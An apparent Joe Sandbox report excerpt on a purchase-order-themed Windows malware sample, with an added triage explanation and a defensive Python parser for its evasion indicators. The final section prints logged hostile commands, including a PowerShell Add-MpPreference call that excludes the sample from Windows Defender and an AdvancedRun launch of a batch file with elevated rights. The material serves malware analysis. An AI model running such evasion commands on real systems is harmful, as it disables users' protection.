                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: 08042021New-PurchaseOrder.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 6_2_0040B50D push ecx; ret
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe File created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe File created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe File opened: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Code function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Process information set: NOOPENFILEERRORBOX (43 identical entries)
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX (20 identical entries)
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe  Process information set: NOOPENFILEERRORBOX (57 identical entries)
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe  Process information set: NOOPENFILEERRORBOX (9 identical entries)
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe  Process information set: NOOPENFILEERRORBOX (8 identical entries)

                      Malware Analysis System Evasion:

                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe  File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5127
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2128
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4329
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2904
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Window / User API: threadDelayed 3085
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Window / User API: threadDelayed 6729
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1332  Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308  Thread sleep count: 4329 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308  Thread sleep count: 2904 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228  Thread sleep count: 52 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1320  Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6112  Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220  Thread sleep count: 3085 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220  Thread sleep count: 6729 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Thread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmp  Binary or memory string: Hyper-V
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmp  Binary or memory string: Hyper-V RAWy
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmp  Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmp  Binary or memory string: Hyper-V RAW
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmp  Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmp  Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: AdvancedRun.exe, 00000023.00000002.431211915.000000000083B000.00000004.00000020.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmp  Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmp  Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Process information queried: ProcessInformation
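
Triage note and added example (not part of the Joe Sandbox report, the sandbox's own tooling or the sample): the entries in this report are low-level indicators whose weight depends on context. The "Process information set" flags (NOOPENFILEERRORBOX, FAILCRITICALERRORS, NOGPFAULTERRORBOX) are the SEM_* hard-error-mode flags a process sets through SetErrorMode; they stop Windows from raising a dialog on a missing file, a critical error or a crash, so the process never hangs on a message box that nobody in a sandbox will click, but .NET, PowerShell and WerFault set them routinely, so on their own they are weak evidence. The WMI classes queried by 08042021New-PurchaseOrder.exe (Win32_BaseBoard, Win32_NetworkAdapterConfiguration, Win32_Processor) expose the board manufacturer and product, the MAC addresses and the CPU name, which is exactly what VM-detection code compares against hypervisor vendor strings. The delay value 922337203685477 ms is the relative timeout 0x8000000000000000 (in 100 ns units) that SleepEx(INFINITE) hands to NtDelayExecution, printed by the sandbox as truncated milliseconds: an infinite wait, which is what Thread.Sleep(Timeout.Infinite) produces in .NET. An idle PowerShell host thread waits the same way (hence the identical powershell.exe entries), so the stronger stalling signal is the sample's own thread issuing 3085 and 6729 short sleeps in a loop. The SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00 device interface path is the virtual CD-ROM of a VMware guest; the report shows AdvancedRun.exe opened it but does not establish whether that was a deliberate check. The Hyper-V memory strings, by contrast, come from PowerShell's Hyper-V module directory and from Host Compute Service error-message text that is present on a stock Windows install, and should not be read as a hypervisor check by the sample. The script below, written for this page, parses "Source:" lines in the fused form the text export produces (path and event run together; a space-separated form is accepted too), groups the indicators per process and applies these interpretations. The regular expressions, the list of fingerprinting WMI classes, the three-minute and 1,000-sleep thresholds and the sample lines (copied from this report) are the example's own assumptions.

```python
"""Group evasion / anti-debug indicators from Joe Sandbox 'Source:' lines per process.
Added example for this page; regexes, lists, thresholds and sample lines are its own."""
import re
from collections import defaultdict

# The text export runs the cells together: 'Source: <path>.exe<event>'.  Paths end in
# '.exe' (lazy match), ' TID: <n>' may follow, whitespace between cells is tolerated.
SOURCE_RE = re.compile(r"^\s*Source:\s*(?P<proc>[A-Za-z]:\\.+?\.exe)"
                       r"(?:\s+TID:\s*(?P<tid>\d+))?\s*(?P<event>.+?)\s*$")
# Memory-string hits name the process without a path: 'Source: x.exe, <pid>...sdmp'.
MEMSTR_RE = re.compile(r"^\s*Source:\s*(?P<proc>\S+?\.exe),.*?"
                       r"Binary or memory string:\s*(?P<s>.+?)\s*$")
ERRMODE_RE = re.compile(r"Process information set:\s*(?P<flags>.+)")
WMI_RE = re.compile(r"WMI Queries:.*?(?P<cls>Win32_\w+)")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(?P<ms>\d+)")
SLEEPCOUNT_RE = re.compile(r"Thread sleep count:\s*(?P<n>\d+)")
FILEOPEN_RE = re.compile(r"File opened / queried:\s*(?P<path>\S+)")

# WMI classes whose manufacturer / MAC / CPU strings VM checks compare against vendor names.
VM_FINGERPRINT_CLASSES = {"Win32_BIOS", "Win32_BaseBoard", "Win32_ComputerSystem",
                          "Win32_Processor", "Win32_NetworkAdapter",
                          "Win32_NetworkAdapterConfiguration", "Win32_DiskDrive"}
HYPERVISOR_TOKENS = ("vmware", "necvmwar", "vbox", "virtualbox", "qemu", "xen")
LONG_SLEEP_MS = 180_000      # 3 minutes (assumed threshold)
SLEEP_LOOP_COUNT = 1_000     # sleeps on one thread that look like a stalling loop (assumed)
# SleepEx(INFINITE) gives NtDelayExecution the relative timeout 0x8000000000000000 (100 ns
# units); the sandbox prints it as milliseconds, truncated.
INFINITE_SLEEP_MS = 2**63 // 10_000   # 922337203685477

def describe_delay(ms: int) -> str:
    """Classify a 'Thread delayed' value (milliseconds)."""
    if ms >= INFINITE_SLEEP_MS:
        return "infinite (Sleep(INFINITE))"
    return f"long ({ms / 60_000:.1f} min)" if ms >= LONG_SLEEP_MS else "short"

def summarize(lines):
    """Return {process: indicators} for the given report lines."""
    out = defaultdict(lambda: {"error_mode": defaultdict(int), "vm_wmi": [],
                               "delays": [], "sleep_counts": [], "hide_from_debugger": 0,
                               "vm_device_paths": [], "memory_strings": []})
    for line in lines:
        if (m := MEMSTR_RE.match(line)):
            out[m["proc"]]["memory_strings"].append(m["s"])
            continue
        if not (m := SOURCE_RE.match(line)):
            continue
        rec, event = out[m["proc"]], m["event"]
        if (e := ERRMODE_RE.search(event)):
            for flag in e["flags"].split("|"):
                rec["error_mode"][flag.strip()] += 1
        elif (w := WMI_RE.search(event)):
            if w["cls"] in VM_FINGERPRINT_CLASSES:
                rec["vm_wmi"].append(w["cls"])
        elif (d := DELAY_RE.search(event)):
            rec["delays"].append((int(d["ms"]), describe_delay(int(d["ms"]))))
        elif (c := SLEEPCOUNT_RE.search(event)):
            rec["sleep_counts"].append(int(c["n"]))
        elif "HideFromDebugger" in event:
            rec["hide_from_debugger"] += 1
        elif (f := FILEOPEN_RE.search(event)):
            if any(t in f["path"].lower() for t in HYPERVISOR_TOKENS):
                rec["vm_device_paths"].append(f["path"])
    return {proc: dict(rec) for proc, rec in out.items()}

def findings(summary):
    """Triage notes per process; the last two kinds are weak on their own."""
    notes = []
    for proc, rec in summary.items():
        name = proc.rsplit("\\", 1)[-1]
        if rec["vm_wmi"]:
            notes.append(f"{name}: VM-fingerprinting WMI classes {sorted(set(rec['vm_wmi']))}")
        if rec["vm_device_paths"]:
            notes.append(f"{name}: opened hypervisor device path {rec['vm_device_paths'][0]}")
        if rec["hide_from_debugger"]:
            notes.append(f"{name}: ThreadHideFromDebugger set {rec['hide_from_debugger']}x")
        if any(n >= SLEEP_LOOP_COUNT for n in rec["sleep_counts"]):
            notes.append(f"{name}: sleep loop, {max(rec['sleep_counts'])} sleeps on one thread")
        for ms, kind in rec["delays"]:
            if kind != "short":  # idle host threads (PowerShell) also wait forever
                notes.append(f"{name}: {kind} delay of {ms} ms")
        if rec["error_mode"]:    # .NET, PowerShell and WerFault set these routinely
            notes.append(f"{name}: error dialogs suppressed ({', '.join(sorted(rec['error_mode']))})")
        if rec["memory_strings"]:  # 'Hyper-V' occurs in stock module paths and HCS error text
            notes.append(f"{name}: {len(rec['memory_strings'])} hypervisor-related memory string(s)")
    return notes

# Sample input: lines copied from the report above, in the fused export form.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX",
    r"Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220Thread sleep count: 6729 > 30",
    r"Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmpBinary or memory string: Hyper-V",
]
```

Usage: `findings(summarize(SAMPLE_LINES))` yields one note per indicator class, with the sample's WMI fingerprinting, its hidden threads and its sleep loop listed before the error-mode and memory-string notes that a stock host also produces. Feed it the whole "Source:" list of a report to see at a glance which process carries the evasion logic (here the dropped SWqTT.exe repeats the parent's behaviour) rather than reading hundreds of identical lines.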

                      Anti Debugging:

                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe  Thread information set: HideFromDebugger (17 identical entries)
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B8 LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
